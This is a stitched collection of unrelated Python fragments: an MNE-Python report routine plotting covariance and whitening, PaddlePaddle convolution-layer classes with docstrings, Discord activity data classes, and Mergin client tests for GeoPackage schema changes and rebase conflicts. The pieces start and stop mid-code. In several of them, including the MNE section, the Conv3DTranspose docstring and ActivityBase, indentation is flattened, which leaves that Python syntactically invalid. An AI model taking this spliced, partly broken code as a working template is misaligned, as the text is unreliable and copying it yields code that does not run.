print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped (sphere)' % section)
else:
print(' %s skipped' % section)
#
# Covariance
#
section = 'Covariance'
if p.report_params.get('covariance', True):
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
cov_name = p.report_params.get('covariance', None)
cov_name = _get_cov_name(p, subj, cov_name)
if cov_name is None:
print(' Missing covariance: %s'
% op.basename(cov_name), end='')
else:
noise_cov = mne.read_cov(cov_name)
info = raw_pca.info
figs = plot_cov(
noise_cov, info, show=False, verbose='error')
captions = ['%s: %s' % (section, kind)
for kind in ('images', 'SVDs')]
report.add_figs_to_section(
figs, captions, section=section, image_format='png')
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# Whitening
#
section = 'Whitening'
if p.report_params.get('whitening', False):
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
whitenings = p.report_params['whitening']
if not isinstance(whitenings, (list, tuple)):
whitenings = [whitenings]
for whitening in whitenings:
assert isinstance(whitening, dict)
analysis = whitening['analysis']
name = whitening['name']
cov_name = _get_cov_name(p, subj, whitening.get('cov'))
# Load the inverse
fname_evoked = op.join(inv_dir, '%s_%d%s_%s_%s-ave.fif'
% (analysis, p.lp_cut, p.inv_tag,
p.eq_tag, subj))
if cov_name is None:
if whitening.get('cov') is not None:
extra = ': %s' % op.basename(whitening['cov'])
else:
extra = ''
print(' Missing cov%s' % extra, end='')
elif not op.isfile(fname_evoked):
print(' Missing evoked: %s'
% op.basename(fname_evoked), end='')
else:
noise_cov = mne.read_cov(cov_name)
# too messy to plot separately, just plot the main one
all_evoked = _get_std_even_odd(fname_evoked, name)
figs = list()
n_s = sum(k in all_evoked[0] for k in ('meg', 'eeg'))
n_e = len(all_evoked)
n_row = n_s * n_e + 1
figs, axes = plt.subplots(
n_row, 1, figsize=(7, 3 * n_row))
captions = [
'%s: %s["%s"] (N=%s)'
% (section, analysis, all_evoked[0].comment,
'/'.join(str(evo.nave) for evo in all_evoked))]
for ei, evo in enumerate(all_evoked):
if ei > 0:
evo.data *= SQRT_2
sl = slice(ei, n_e * n_s, n_e)
these_axes = list(axes[sl]) + [axes[-1]]
evo.plot_white(
noise_cov, verbose='error', axes=these_axes)
for ax in these_axes[:-1]:
n_text = 'N=%d' % (evo.nave,)
if ei != 0:
title = f'{n_text} {SQ2STR}'
else:
title = f'{ax.get_title()[:-1]}; {n_text})'
ax.set(title=title)
xlim = all_evoked[0].times[[0, -1]]
del ei, all_evoked
# joint ylims
for si in range(n_s + 1):
if si == n_s:
ax = axes[-1:]
else:
ax = axes[si * n_e:(si + 1) * n_e]
this_max = max(np.max(np.abs(line.get_ydata()))
for a in ax
for line in a.lines)
if si == n_s:
ax[0].set(ylim=[0, this_max], xlim=xlim)
else:
for a in ax:
a.set(ylim=[-this_max, this_max],
xlim=xlim)
del si
n_real = 0
hs, labels = [], []
for line in axes[-1].lines:
if line.get_linestyle() == '-':
if n_real < n_s:
line.set(linewidth=2)
hs, labels = [line], [line.get_label()]
else:
line.set(alpha=0.5, linewidth=1)
n_real += 1
assert n_real == n_e * n_s
axes[-1].legend(hs, labels)
if n_e > 1:
axes[-1].set_title(
f'{axes[-1].get_title()} (halves {SQ2STR})')
axes[-1]
figs.tight_layout()
report.add_figs_to_section(
figs, captions, section=section,
image_format='png')
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
| |
ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
data_format(str, optional): Data format that specifies the layout of input.
It can be "NCHW" or "NHWC". Default: "NCHW".
Attribute:
**weight** (Parameter): the learnable weights of filters of this layer.
**bias** (Parameter or None): the learnable bias of this layer.
Shape:
- x: :math:`(N, C_{in}, H_{in}, W_{in})`
- output: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H^\prime_{out} &= (H_{in} - 1) * strides[0] - 2 * paddings[0] + dilations[0] * (kernel\_size[0] - 1) + 1
W^\prime_{out} &= (W_{in} - 1) * strides[1] - 2 * paddings[1] + dilations[1] * (kernel\_size[1] - 1) + 1
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[0] )
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[1] )
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
paddle.disable_static()
x_var = paddle.uniform((2, 4, 8, 8), dtype='float32', min=-1., max=1.)
conv = nn.Conv2DTranspose(4, 6, (3, 3))
y_var = conv(x_var)
y_np = y_var.numpy()
print(y_np.shape)
# (2, 6, 10, 10)
"""
def __init__(self,
             in_channels,
             out_channels,
             kernel_size,
             stride=1,
             padding=0,
             output_padding=0,
             dilation=1,
             groups=1,
             weight_attr=None,
             bias_attr=None,
             data_format="NCHW"):
    """Initializes the transposed convolution by delegating to ``_ConvNd``.

    The two positional flags handed to the base class mark the layer as
    transposed (``True``) and two-dimensional (``2``).
    """
    transposed = True
    spatial_dims = 2
    super(Conv2DTranspose, self).__init__(
        in_channels,
        out_channels,
        kernel_size,
        transposed,
        spatial_dims,
        stride=stride,
        padding=padding,
        dilation=dilation,
        output_padding=output_padding,
        groups=groups,
        weight_attr=weight_attr,
        bias_attr=bias_attr,
        data_format=data_format)
def forward(self, x, output_size=None):
    """Applies the transposed convolution to ``x``.

    When an explicit ``output_size`` is given it fully determines the
    output shape, so the stored ``output_padding`` is ignored (passed
    as 0 to the functional op).
    """
    extra_padding = self.output_padding if output_size is None else 0
    return F.conv2d_transpose(
        x,
        self.weight,
        bias=self.bias,
        padding=self._padding,
        output_padding=extra_padding,
        stride=self._stride,
        dilation=self._dilation,
        groups=self._groups,
        output_size=output_size,
        data_format=self._data_format)
class Conv3D(_ConvNd):
    r"""
    **Convolution3d Layer**
    The convolution3d layer calculates the output based on the input, filter
    and strides, paddings, dilations, groups parameters. Input(Input) and
    Output(Output) are multidimensional tensors with a shape of
    :math:`[N, C, D, H, W]` . Where N is batch size, C is the number of
    channels, D is the depth of the feature, H is the height of the feature,
    and W is the width of the feature. Convolution3D is similar with Convolution2D
    but adds one dimension(depth). If bias attribution and activation type are
    provided, bias is added to the output of the convolution, and the
    corresponding activation function is applied to the final result.
    For each input :math:`X`, the equation is:
    ..  math::
        Out = \sigma (W \\ast X + b)
    In the above equation:
    * :math:`X`: Input value, a tensor with NCDHW or NDHWC format.
    * :math:`W`: Filter value, a tensor with MCDHW format.
    * :math:`\\ast`: Convolution operation.
    * :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
    * :math:`\\sigma`: Activation function.
    * :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
    Parameters:
        in_channels(int): The number of input channels in the input image.
        out_channels(int): The number of output channels produced by the convolution.
        kernel_size(int|list|tuple, optional): The size of the convolving kernel.
        stride(int|list|tuple, optional): The stride size. If stride is a tuple, it must
            contain three integers, (stride_D, stride_H, stride_W). Otherwise, the
            stride_D = stride_H = stride_W = stride. The default value is 1.
        padding(int|str|tuple|list, optional): The padding size. Padding could be in one of the following forms.
            1. a string in ['valid', 'same'].
            2. an int, which means each spatial dimension(depth, height, width) is zero padded by size of `padding`
            3. a list[int] or tuple[int] whose length is the number of spatial dimensions, which contains the amount of padding on each side for each spatial dimension. It has the form [pad_d1, pad_d2, ...].
            4. a list[int] or tuple[int] whose length is 2 * number of spatial dimensions. It has the form  [pad_before, pad_after, pad_before, pad_after, ...] for all spatial dimensions.
            5. a list or tuple of pairs of ints. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension are also included. Each pair of integers correspond to the amount of padding for a dimension of the input. Padding in batch dimension and channel dimension should be [0, 0] or (0, 0).
            The default value is 0.
        dilation(int|list|tuple, optional): The dilation size. If dilation is a tuple, it must
            contain three integers, (dilation_D, dilation_H, dilation_W). Otherwise, the
            dilation_D = dilation_H = dilation_W = dilation. The default value is 1.
        groups(int, optional): The groups number of the Conv3D Layer. According to grouped
            convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
            the first half of the filters is only connected to the first half
            of the input channels, while the second half of the filters is only
            connected to the second half of the input channels. The default value is 1.
        padding_mode(str, optional): ``'zeros'``, ``'reflect'``, ``'replicate'`` or ``'circular'``. Default: ``'zeros'``.
        weight_attr(ParamAttr, optional): The parameter attribute for learnable parameters/weights
            of conv3d. If it is set to None or one attribute of ParamAttr, conv3d
            will create ParamAttr as param_attr. If it is set to None, the parameter
            is initialized with :math:`Normal(0.0, std)`, and the :math:`std` is
            :math:`(\frac{2.0 }{filter\_elem\_num})^{0.5}`. The default value is None.
        bias_attr(ParamAttr|bool, optional): The parameter attribute for the bias of conv3d.
            If it is set to False, no bias will be added to the output units.
            If it is set to None or one attribute of ParamAttr, conv3d
            will create ParamAttr as bias_attr. If the Initializer of the bias_attr
            is not set, the bias is initialized zero. The default value is None.
        data_format(str, optional): Data format that specifies the layout of input.
            It can be "NCDHW" or "NDHWC". Default: "NCDHW".
    Attribute:
        **weight** (Parameter): the learnable weights of filters of this layer.
        **bias** (Parameter): the learnable bias of this layer.
    Shape:
        - x: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
        - output: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
        Where
        ..  math::
            D_{out}&= \frac{(D_{in} + 2 * paddings[0] - (dilations[0] * (kernel\_size[0] - 1) + 1))}{strides[0]} + 1
            H_{out}&= \frac{(H_{in} + 2 * paddings[1] - (dilations[1] * (kernel\_size[1] - 1) + 1))}{strides[1]} + 1
            W_{out}&= \frac{(W_{in} + 2 * paddings[2] - (dilations[2] * (kernel\_size[2] - 1) + 1))}{strides[2]} + 1
    Raises:
        ValueError: If the shapes of input, filter_size, stride, padding and
            groups mismatch.
    Examples:
        .. code-block:: python
            import paddle
            import paddle.nn as nn
            paddle.disable_static()
            x_var = paddle.uniform((2, 4, 8, 8, 8), dtype='float32', min=-1., max=1.)
            conv = nn.Conv3D(4, 6, (3, 3, 3))
            y_var = conv(x_var)
            y_np = y_var.numpy()
            print(y_np.shape)
            # (2, 6, 6, 6, 6)
    """

    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_size,
                 stride=1,
                 padding=0,
                 dilation=1,
                 groups=1,
                 padding_mode='zeros',
                 weight_attr=None,
                 bias_attr=None,
                 data_format="NCDHW"):
        # Delegate to _ConvNd; the positional False/3 arguments mark the
        # layer as non-transposed and three-dimensional.
        super(Conv3D, self).__init__(
            in_channels,
            out_channels,
            kernel_size,
            False,
            3,
            stride=stride,
            padding=padding,
            padding_mode=padding_mode,
            dilation=dilation,
            groups=groups,
            weight_attr=weight_attr,
            bias_attr=bias_attr,
            data_format=data_format)

    def forward(self, x):
        # Non-zero padding modes are materialized with an explicit pad op
        # first; the convolution itself then runs with its pre-computed
        # (updated) padding.
        if self._padding_mode != 'zeros':
            x = F.pad(x,
                      self._reversed_padding_repeated_twice,
                      mode=self._padding_mode,
                      data_format=self._data_format)

        out = F.conv._conv_nd(
            x,
            self.weight,
            bias=self.bias,
            stride=self._stride,
            padding=self._updated_padding,
            padding_algorithm=self._padding_algorithm,
            dilation=self._dilation,
            groups=self._groups,
            data_format=self._data_format,
            channel_dim=self._channel_dim,
            op_type=self._op_type,
            use_cudnn=self._use_cudnn)
        return out
class Conv3DTranspose(_ConvNd):
r"""
**Convlution3D transpose layer**
The convolution3D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCDHW format. Where N is batch size, C is the number of channels,
D is the depth of the feature, H is the height of the feature, and W
is the width of the feature. Parameters(dilations, strides, paddings) are
two elements. These two elements represent height and width, respectively.
The details of convolution transpose layer, please refer to the following
explanation and references `therein <http://www.matthewzeiler.com/wp-content/uploads/2017/07/cvpr2010.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
In the above equation:
* :math:`X`: Input value, a tensor with NCDHW format.
* :math:`W`: Filter value, a tensor with MCDHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
**Note**:
The conv3d_transpose can be seen as the backward of the conv3d. For conv3d,
when stride > 1, conv3d maps multiple input shape to the same output shape, | |
__all__ = (
'ActivityAssets',
'ActivityBase',
'ActivityParty',
'ActivitySecrets',
'ActivityTimestamps',
'ACTIVITY_TYPES',
)
from datetime import datetime
from ..utils import DISCORD_EPOCH_START
from ..color import Color
from . import activity_types as ACTIVITY_TYPES
# Fallback activity id used when an activity type has no dedicated custom id.
DEFAULT_CUSTOM_ID = 'UNKNOWN'

# Hard-coded activity ids for the activity types that carry no real
# application id in their payload.
CUSTOM_IDS = {
    ACTIVITY_TYPES.spotify: 'spotify:1',
    ACTIVITY_TYPES.custom: 'custom',
}

# Human-readable name for each known activity type.
ACTIVITY_TYPE_NAMES = {
    ACTIVITY_TYPES.game: 'game',
    ACTIVITY_TYPES.stream: 'stream',
    ACTIVITY_TYPES.spotify: 'spotify',
    ACTIVITY_TYPES.watching: 'watching',
    ACTIVITY_TYPES.custom: 'custom',
    ACTIVITY_TYPES.competing: 'competing',
}
class ActivityTimestamps:
    """
    Represents an activity's timestamp field.

    Attributes
    ----------
    end : `int`
        The time when the activity ends as Unix time in milliseconds. Defaults to `0`.
    start : `int`
        The time when the activity starts as Unix time in milliseconds. Defaults to `0`.
    """
    __slots__ = (
        'end',
        'start',
    )

    def __init__(self, timestamps_data):
        """
        Creates a new activity timestamp object from the given data.

        Parameters
        ----------
        timestamps_data : `dict` of (`str`, `Any`) items
            Activity timestamp data.
        """
        self.start = timestamps_data.get('start', 0)
        self.end = timestamps_data.get('end', 0)

    def __repr__(self):
        """Returns the activity timestamp's representation."""
        repr_parts = [
            '<',
            self.__class__.__name__,
        ]

        start = self.start
        if start:
            repr_parts.append(' start=')
            repr_parts.append(repr(start))
            field_added = True
        else:
            field_added = False

        end = self.end
        if end:
            if field_added:
                repr_parts.append(',')
            repr_parts.append(' end=')
            # Bug fix: this previously rendered ``repr(start)`` for the
            # ``end`` field, so the repr showed the wrong value.
            repr_parts.append(repr(end))

        repr_parts.append('>')
        return ''.join(repr_parts)

    def __eq__(self, other):
        """Returns whether the two activity timestamps are equal."""
        if type(self) is not type(other):
            return NotImplemented

        if self.start != other.start:
            return False

        if self.end != other.end:
            return False

        return True

    def to_data(self):
        """
        Serializes the activity timestamp.

        Returns
        -------
        timestamps_data : `dict` of (`str`, `Any`) items
        """
        timestamps_data = {}

        start = self.start
        if start:
            timestamps_data['start'] = start

        end = self.end
        if end:
            timestamps_data['end'] = end

        return timestamps_data
class ActivityAssets:
    """
    Represents a discord activity asset.

    Attributes
    ----------
    image_large : `None` or `str`
        The id of the activity's large asset to display. Defaults to `None`.
    image_small : `None` or `str`
        The id of the activity's small asset to display. Defaults to `None`.
    text_large : `None` or `str`
        The hover text of the large asset. Defaults to `None`.
    text_small : `None` or `str`
        The hover text of the small asset. Defaults to `None`.
    """
    __slots__ = (
        'image_large',
        'image_small',
        'text_large',
        'text_small',
    )

    def __init__(self, assets_data):
        """
        Creates a new activity asset object from the given data.

        Parameters
        ----------
        assets_data : `dict` of (`str`, `Any`) items
            Activity asset data.
        """
        get = assets_data.get
        self.image_large = get('large_image', None)
        self.image_small = get('small_image', None)
        self.text_large = get('large_text', None)
        self.text_small = get('small_text', None)

    def __repr__(self):
        """Returns the activity asset's representation."""
        pieces = []
        for attr_name in ('image_large', 'image_small', 'text_large', 'text_small'):
            value = getattr(self, attr_name)
            if value is not None:
                pieces.append(f'{attr_name}={value!r}')

        if pieces:
            return f'<{self.__class__.__name__} {", ".join(pieces)}>'

        return f'<{self.__class__.__name__}>'

    def __eq__(self, other):
        """Returns whether the two activity assets are equal."""
        if type(self) is not type(other):
            return NotImplemented

        return (
            self.image_large == other.image_large
            and self.image_small == other.image_small
            and self.text_large == other.text_large
            and self.text_small == other.text_small
        )

    def to_data(self):
        """
        Serializes the activity asset.

        Returns
        -------
        assets_data : `dict` of (`str`, `Any`) items
        """
        assets_data = {}
        # Only populated fields are serialized; insertion order matches the
        # attribute order above.
        for key, value in (
                ('large_image', self.image_large),
                ('small_image', self.image_small),
                ('large_text', self.text_large),
                ('small_text', self.text_small)):
            if value is not None:
                assets_data[key] = value

        return assets_data
class ActivityParty:
    """
    Represents a discord activity party.

    Attributes
    ----------
    id : `None` or `str`
        The party's id, which in the player is. Defaults to `None`.
    size : `int`
        The party's actual size, which in the player is. Defaults to `0`.
    max : `int`
        The party's maximal size, which in the player is. Defaults to `0`.
    """
    __slots__ = (
        'id',
        'size',
        'max',
    )

    def __init__(self, party_data):
        """
        Creates a new activity party object from the given data.

        Parameters
        ----------
        party_data : `dict` of (`str`, `Any`) items
            Activity party data.
        """
        self.id = party_data.get('id', None)

        # The payload's `size` field is a 2-element array:
        # [current_size, max_size].
        try:
            size, max_ = party_data['size']
        except KeyError:
            size = 0
            max_ = 0

        self.size = size
        self.max = max_

    def __repr__(self):
        """Returns the activity party's representation."""
        repr_parts = [
            '<',
            self.__class__.__name__,
        ]

        id_ = self.id
        # Bug fix: this previously tested the builtin ``id`` (always truthy)
        # instead of ``id_``, so `` id_=None`` leaked into every repr.
        if id_ is not None:
            repr_parts.append(' id_=')
            repr_parts.append(repr(id_))
            field_added = True
        else:
            field_added = False

        size = self.size
        max_ = self.max
        if size or max_:
            if field_added:
                repr_parts.append(',')
            repr_parts.append(' size=')
            repr_parts.append(repr(size))
            repr_parts.append(', max=')
            repr_parts.append(repr(max_))

        repr_parts.append('>')
        return ''.join(repr_parts)

    def __eq__(self, other):
        """Returns whether the two activity parties are equal."""
        if type(self) is not type(other):
            return NotImplemented

        if self.id != other.id:
            return False

        if self.size != other.size:
            return False

        if self.max != other.max:
            return False

        return True

    def to_data(self):
        """
        Serializes the activity party.

        Returns
        -------
        party_data : `dict` of (`str`, `Any`) items
        """
        party_data = {}

        id_ = self.id
        if id_ is not None:
            party_data['id'] = id_

        size = self.size
        max_ = self.max
        if size or max_:
            party_data['size'] = [size, max_]

        return party_data
class ActivitySecrets:
    """
    Represents an activity secret.

    Attributes
    ----------
    join : `None` or `str`
        Unique hash used for joining the party. Defaults to `None`.
    match : `None` or `str`
        Unique hash for the specific instanced match. Defaults to `None`.
    spectate : `None` or `str`
        Unique hash for spectating the activity. Defaults to `None`.
    """
    __slots__ = (
        'join',
        'match',
        'spectate',
    )

    def __init__(self, secrets_data):
        """
        Creates a new activity secret object from the given data.

        Parameters
        ----------
        secrets_data : `dict` of (`str`, `Any`) items
            Activity secret data.
        """
        get = secrets_data.get
        self.join = get('join', None)
        self.spectate = get('spectate', None)
        self.match = get('match', None)

    def __repr__(self):
        """Returns the activity secret's representation."""
        pieces = []
        # Order matters: join, spectate, match — matches the original repr.
        for name in ('join', 'spectate', 'match'):
            value = getattr(self, name)
            if value is not None:
                pieces.append(f'{name}={value!r}')

        if pieces:
            return f'<{self.__class__.__name__} {", ".join(pieces)}>'

        return f'<{self.__class__.__name__}>'

    def __eq__(self, other):
        """Returns whether the two activity secrets are equal."""
        if type(self) is not type(other):
            return NotImplemented

        return (
            self.join == other.join
            and self.spectate == other.spectate
            and self.match == other.match
        )

    def to_data(self):
        """
        Serializes the activity secret.

        Returns
        -------
        secrets_data : `dict` of (`str`, `Any`) items
        """
        secrets_data = {}
        for key in ('join', 'spectate', 'match'):
            value = getattr(self, key)
            if value is not None:
                secrets_data[key] = value

        return secrets_data
class ActivityBase:
"""
Base class for activities.
Class Attributes
----------------
created : `int` = `0`
When the activity was created as Unix time in milliseconds.
name : `str` = `'Unknown'`
The activity's name. Subclasses might overwrite it as member descriptor.
id : `int` = `0`
The activity's id. Subclasses might overwrite it as member descriptor.
type : `int` = `127`
The activity's type value.
"""
name = 'Unknown'
id = 0
type = 127
created = 0
__slots__ = ()
def __new__(cls, data):
    """
    Creates a new activity. ``ActivityBase`` and its subclass ``ActivityUnknown`` cannot be
    instanced, so this always raises `RuntimeError`.

    Parameters
    ----------
    data : `dict` of (`str`, `Any`) items
        Activity data received from Discord.

    Raises
    ------
    RuntimeError
        Always; instantiable activity types overwrite ``__new__``.
    """
    raise RuntimeError(f'{cls.__name__} cannot be instanced.')
def __str__(self):
    """Returns the activity's name (``'Unknown'`` unless a subclass overwrites ``name``)."""
    return self.name
def __repr__(self):
    """Returns the activity's representation, e.g. ``<ActivityBase name='Unknown'>``."""
    return f'<{self.__class__.__name__} name={self.name!r}>'
def __hash__(self):
    """Returns the activity's hash value, which equals its ``id`` (`0` on the base class)."""
    return self.id
def __eq__(self, other):
    """
    Returns whether the two activities are equal.

    Subclasses should overwrite it.
    """
    # Returning NotImplemented lets Python fall back to the other operand's __eq__.
    return NotImplemented
@property
def color(self):
    """
    Returns the activity's color.

    Subclasses should overwrite it.

    Returns
    -------
    color : ``Color``
    """
    # A no-argument Color() — presumably the zero/blank color; confirm against Color's ctor.
    return Color()
@property
def discord_side_id(self):
"""
Returns the activity's Discord side id. If the activity implements id returns that, else returns it's
`CUSTOM_ID` class attribute.
| |
This simulates another app (e.g. QGIS) having a connection open, potentially
with some active reader/writer.
Note: we use a subprocess here instead of just using sqlite3 module from python
because pygeodiff and python's sqlite3 module have their own sqlite libraries,
and this does not work well when they are used in a single process. But if we
use another process, things are fine. This is a limitation of how we package
pygeodiff currently.
"""
def __init__(self, filename):
    """Start the helper process, which opens `filename` with its own sqlite3 library."""
    helper_script = os.path.join(os.path.dirname(__file__), 'sqlite_con.py')
    self.proc = subprocess.Popen(
        ['python3', helper_script, filename],
        stdin=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
def run(self, cmd):
    """Send one command line to the helper subprocess over its stdin pipe."""
    pipe = self.proc.stdin
    pipe.write(cmd.encode() + b'\n')
    pipe.flush()
def close(self):
    """Ask the helper subprocess to stop and raise if it reported an error."""
    _out, err = self.proc.communicate(b'stop\n')
    if self.proc.returncode != 0:
        raise ValueError("subprocess error:\n" + err.decode('utf-8'))
def test_push_gpkg_schema_change(mc):
    """ Test that changes in GPKG get picked up if there were recent changes to it by another
    client and at the same time geodiff fails to find changes (a new table is added)
    """
    test_project = 'test_push_gpkg_schema_change'
    project = API_USER + '/' + test_project
    project_dir = os.path.join(TMP_DIR, test_project)
    test_gpkg = os.path.join(project_dir, 'test.gpkg')
    # the basefile is the client's pristine copy of the server version, used for diffing
    test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
    project_dir_verify = os.path.join(TMP_DIR, test_project + '_verify')
    test_gpkg_verify = os.path.join(project_dir_verify, 'test.gpkg')
    cleanup(mc, project, [project_dir, project_dir_verify])
    # create remote project
    os.makedirs(project_dir)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
    #shutil.copytree(TEST_DATA_DIR, project_dir)
    mc.create_project_and_push(test_project, project_dir)
    mp = MerginProject(project_dir)
    mp.log.info(' // create changeset')
    # sanity check: geodiff can diff the unmodified file against the basefile
    mp.geodiff.create_changeset(mp.fpath('test.gpkg'), mp.fpath_meta('test.gpkg'), mp.fpath_meta('diff-0'))
    mp.log.info(' // use wal')
    _use_wal(test_gpkg)
    mp.log.info(' // make changes to DB')
    # open a connection and keep it open (qgis does this with a pool of connections too)
    acon2 = AnotherSqliteConn(test_gpkg)
    acon2.run('select count(*) from simple;')
    # add a new table to ensure that geodiff will fail due to unsupported change
    # (this simulates an independent reader/writer like GDAL)
    _create_test_table(test_gpkg)
    _check_test_table(test_gpkg)
    # the basefile must not have the new table yet
    with pytest.raises(sqlite3.OperationalError):
        _check_test_table(test_gpkg_basefile)
    mp.log.info(' // create changeset (2)')
    # why already here there is wal recovery - it could be because of two sqlite libs linked in one executable
    # INDEED THAT WAS THE PROBLEM, now running geodiff 1.0 with shared sqlite lib seems to work fine.
    with pytest.raises(pygeodiff.geodifflib.GeoDiffLibError):
        mp.geodiff.create_changeset(mp.fpath('test.gpkg'), mp.fpath_meta('test.gpkg'), mp.fpath_meta('diff-1'))
    _check_test_table(test_gpkg)
    with pytest.raises(sqlite3.OperationalError):
        _check_test_table(test_gpkg_basefile)
    mp.log.info(' // push project')
    # push pending changes (it should include addition of the new table)
    # at this point we still have an open sqlite connection to the GPKG, so checkpointing will not work correctly)
    mc.push_project(project_dir)
    # WITH TWO SQLITE copies: fails here (sqlite3.OperationalError: disk I/O error) + in geodiff log: SQLITE3: (283)recovered N frames from WAL file
    _check_test_table(test_gpkg)
    # OLD: fails here when con2 is still alive: checkpointing fails and basefile has incorrect value
    _check_test_table(test_gpkg_basefile)
    # download the project to a new directory and verify the change was pushed correctly
    mc.download_project(project, project_dir_verify)
    # OLD: fails here
    _check_test_table(test_gpkg_verify)
    acon2.close()
@pytest.mark.parametrize("extra_connection", [False, True])
def test_rebase_local_schema_change(mc, extra_connection):
    """
    Checks whether a pull with failed rebase (due to local DB schema change) is handled correctly,
    i.e. a conflict file is created with the content of the local changes.
    """
    test_project = 'test_rebase_local_schema_change'
    if extra_connection:
        test_project += '_extra_conn'
    project = API_USER + '/' + test_project
    project_dir = os.path.join(TMP_DIR, test_project)  # primary project dir
    project_dir_2 = os.path.join(TMP_DIR, test_project+'_2')  # concurrent project dir
    test_gpkg = os.path.join(project_dir, 'test.gpkg')
    test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
    test_gpkg_conflict = conflicted_copy_file_name(test_gpkg, API_USER, 1)
    cleanup(mc, project, [project_dir, project_dir_2])
    os.makedirs(project_dir)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
    _use_wal(test_gpkg)  # make sure we use WAL, that's the more common and more difficult scenario
    mc.create_project_and_push(test_project, project_dir)
    if extra_connection:
        # open a connection and keep it open (qgis does this with a pool of connections too)
        con_extra = sqlite3.connect(test_gpkg)
        cursor_extra = con_extra.cursor()
        cursor_extra.execute('select count(*) from simple;')
    # Download project to the concurrent dir + add a feature + push a new version
    mc.download_project(project, project_dir_2)  # download project to concurrent dir
    mp_2 = MerginProject(project_dir_2)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_A.gpkg'), mp_2.fpath('test.gpkg'))
    mc.push_project(project_dir_2)
    # Change schema in the primary project dir
    _create_test_table(test_gpkg)
    pull_changes, push_changes, _ = mc.project_status(project_dir)
    assert _is_file_updated('test.gpkg', pull_changes)
    assert _is_file_updated('test.gpkg', push_changes)
    assert not os.path.exists(test_gpkg_conflict)
    # the local schema change cannot be rebased on top of the remote row insert,
    # so pull must fall back to writing the local content into a conflict copy
    mc.pull_project(project_dir)
    assert os.path.exists(test_gpkg_conflict)
    # check the results after pull:
    # - conflict copy should contain the new table
    # - local file + basefile should not contain the new table
    _check_test_table(test_gpkg_conflict)
    with pytest.raises(sqlite3.OperationalError):
        _check_test_table(test_gpkg_basefile)
    with pytest.raises(sqlite3.OperationalError):
        _check_test_table(test_gpkg)
    # check that the local file + basefile contain the new row, and the conflict copy doesn't
    assert _get_table_row_count(test_gpkg, 'simple') == 4
    assert _get_table_row_count(test_gpkg_basefile, 'simple') == 4
    assert _get_table_row_count(test_gpkg_conflict, 'simple') == 3
@pytest.mark.parametrize("extra_connection", [False, True])
def test_rebase_remote_schema_change(mc, extra_connection):
    """
    Checks whether a pull with failed rebase (due to remote DB schema change) is handled correctly,
    i.e. a conflict file is created with the content of the local changes.
    """
    test_project = 'test_rebase_remote_schema_change'
    if extra_connection:
        test_project += '_extra_conn'
    project = API_USER + '/' + test_project
    project_dir = os.path.join(TMP_DIR, test_project)  # primary project dir
    project_dir_2 = os.path.join(TMP_DIR, test_project+'_2')  # concurrent project dir
    test_gpkg = os.path.join(project_dir, 'test.gpkg')
    test_gpkg_2 = os.path.join(project_dir_2, 'test.gpkg')
    test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
    test_gpkg_conflict = conflicted_copy_file_name(test_gpkg, API_USER, 1)
    cleanup(mc, project, [project_dir, project_dir_2])
    os.makedirs(project_dir)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
    _use_wal(test_gpkg)  # make sure we use WAL, that's the more common and more difficult scenario
    mc.create_project_and_push(test_project, project_dir)
    # Download project to the concurrent dir + change DB schema + push a new version
    mc.download_project(project, project_dir_2)
    _create_test_table(test_gpkg_2)
    mc.push_project(project_dir_2)
    # do changes in the local DB (added a row)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_A.gpkg'), test_gpkg)
    _use_wal(test_gpkg)  # make sure we use WAL
    if extra_connection:
        # open a connection and keep it open (qgis does this with a pool of connections too)
        con_extra = sqlite3.connect(test_gpkg)
        cursor_extra = con_extra.cursor()
        cursor_extra.execute('select count(*) from simple;')
    pull_changes, push_changes, _ = mc.project_status(project_dir)
    assert _is_file_updated('test.gpkg', pull_changes)
    assert _is_file_updated('test.gpkg', push_changes)
    assert not os.path.exists(test_gpkg_conflict)
    # the incoming remote change carries the schema change, so the local row insert
    # cannot be rebased on top of it and must end up in a conflict copy
    mc.pull_project(project_dir)
    assert os.path.exists(test_gpkg_conflict)
    # check the results after pull:
    # - conflict copy should not contain the new table
    # - local file + basefile should contain the new table
    _check_test_table(test_gpkg)
    _check_test_table(test_gpkg_basefile)
    with pytest.raises(sqlite3.OperationalError):
        _check_test_table(test_gpkg_conflict)
    # check that the local file + basefile don't contain the new row, and the conflict copy does
    assert _get_table_row_count(test_gpkg, 'simple') == 3
    assert _get_table_row_count(test_gpkg_basefile, 'simple') == 3
    assert _get_table_row_count(test_gpkg_conflict, 'simple') == 4
